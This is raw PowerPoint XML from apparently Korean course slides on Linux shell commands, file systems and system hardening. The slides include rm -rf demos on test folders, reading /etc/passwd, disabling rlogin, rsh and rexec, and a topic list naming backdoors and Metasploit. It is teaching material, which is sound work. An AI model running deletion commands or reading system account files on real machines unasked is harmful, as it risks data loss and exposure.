                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3  test4</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rm file*</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`file2'? </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`file3'?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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>newfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>oldfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3  test4</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rm -r test3/</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>디렉토리 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`test3/’?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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>newfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>oldfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test4</a:t>
              </a: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rm -rf test4/       </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="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r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>newfile</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>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rm *</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>newfile</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 remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>oldfile</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test2]#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33927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touch file1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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>File1</a:t>
              </a:r>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mv file1 file2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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>File2</a:t>
              </a:r>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touch file1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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  file1  file2</a:t>
              </a:r>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mv file1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ls</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  file2</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test2]#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dirty="0"/>
                <a:t>file1</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42215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dirty="0"/>
                <a:t>File1</a:t>
              </a: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file1 file2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dirty="0"/>
                <a:t>file1  file2</a:t>
              </a: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file1 file2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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dir1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>file1  file2</a:t>
              </a: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dirty="0"/>
                <a:t>file1  file2</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06914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--help</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>Usage: 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or multiple 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--archive                same as -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>dR</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> --preserve=all</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>      --backup[=CONTROL]       make a backup of each existing destination file</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>  -b                           like --backup but does not accept an argument</a:t>
              </a:r>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81043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head/tail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cat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 less /etc/passwd</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rpcuser:x:29:29:RPC Service User:/var/lib/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NFS User:/var/lib/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dirty="0" err="1"/>
                <a:t>mqueue</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dirty="0" err="1"/>
                <a:t>mqueue</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distcache:x:94:94:Distcache:/:/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highlight>
                    <a:srgbClr val="A6A6A6"/>
                  </a:highlight>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">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dirty="0"/>
                <a:t>, Page Up, Page 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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>head –n 5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> /etc/passwd  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>문서의 머리</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(head)</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5</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="nb-NO" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> /etc/passwd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0526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58489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909540227"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3921981" y="1690688"/>
          <a:ext cx="3959749" cy="4671384"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>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5"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hlinkClick r:id="rId6"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7"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17616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dirty="0" err="1">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dirty="0" err="1">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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33070609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dirty="0"/>
              <a:t>/test/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a: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dirty="0" err="1"/>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dirty="0"/>
              <a:t>&lt;User&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23686357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File Allocation Table</a:t>
            </a:r>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NT File System</a:t>
            </a:r>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dirty="0"/>
              <a:t>Extended File System</a:t>
            </a:r>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96130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/Theory/T3/Def </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 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dirty="0"/>
              <a:t>/test/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a: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dirty="0" err="1"/>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dirty="0"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SystemCall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="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dirty="0"/>
              <a:t>&lt;User&gt;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dirty="0"/>
              <a:t>Write </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
              <a:t>/test/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1"/>
              <a:t>myfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0" err="1">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sys_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>()</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dirty="0"/>
              <a:t>Write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>Excute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>!</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0885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dirty="0"/>
              <a:t>MINIX File System</a:t>
            </a:r>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dirty="0"/>
              <a:t>Extended File System </a:t>
            </a:r>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dirty="0"/>
              <a:t>Extended File System 2 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gigabyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="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크기는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="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dirty="0"/>
              <a:t>Extended File System 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dirty="0"/>
              <a:t>Extended File System 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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39952127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4"/>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249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[Program Files]</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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3438046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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="222222"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Source Sans Pro" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>(file system check)</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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0674FD72-038E-4245-96EE-CA4710BB00E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273653" y="4445185"/>
            <a:ext cx="11720338" cy="2134110"/>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시스템의 패스워드 파일을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672646" y="4896062"/>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5" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B3B67A-E8FF-4513-8017-74CFE540FCF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7958528" y="5147314"/>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etc</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41668" y="544042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319089" y="5717428"/>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846020" y="598479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05216" y="6271947"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27293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5" grpId="0"/>
      <p:bldP spid="66" grpId="0"/>
      <p:bldP spid="67" grpId="0"/>
      <p:bldP spid="68" grpId="0"/>
      <p:bldP spid="6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dirty="0"/>
              <a:t>File System</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="475257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194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 Super Block</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121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dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="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dirty="0"/>
              <a:t>Router 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&lt;WSL2 docker&gt;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9890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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>TimeStamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                        </a:rPr>
                        <a:t>Field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dirty="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st_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">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st_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">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st_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">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3"/>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 head,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때는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0" err="1">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하면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ctime</a:t>
                      </a:r>
                      <a:r>
                        <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rPr>
                        <a:t>(Change Time)</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39841091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3891362623"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="2706182"/>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dirty="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7">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수업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9741237"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="21107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4438503"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="175895">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348838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="140716">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334361"/>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6153746"/>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351988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2296790"/>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999074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System</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Network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Web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Malware</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11566257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ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>백도어 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Metasploit,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75217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8980290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31227227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dirty="0"/>
              <a:t>(test) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test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12886732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dirty="0"/>
              <a:t># grep root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dirty="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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37881960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1902467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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25783825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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/rlogin</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경 후 저장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>비활성화</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xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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disable = no”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>disable = yes”</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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/rlogin /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xinetd.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> | grep disable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 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>hosts.equiv</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hosts.equiv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spTree>
    <p:extLst>
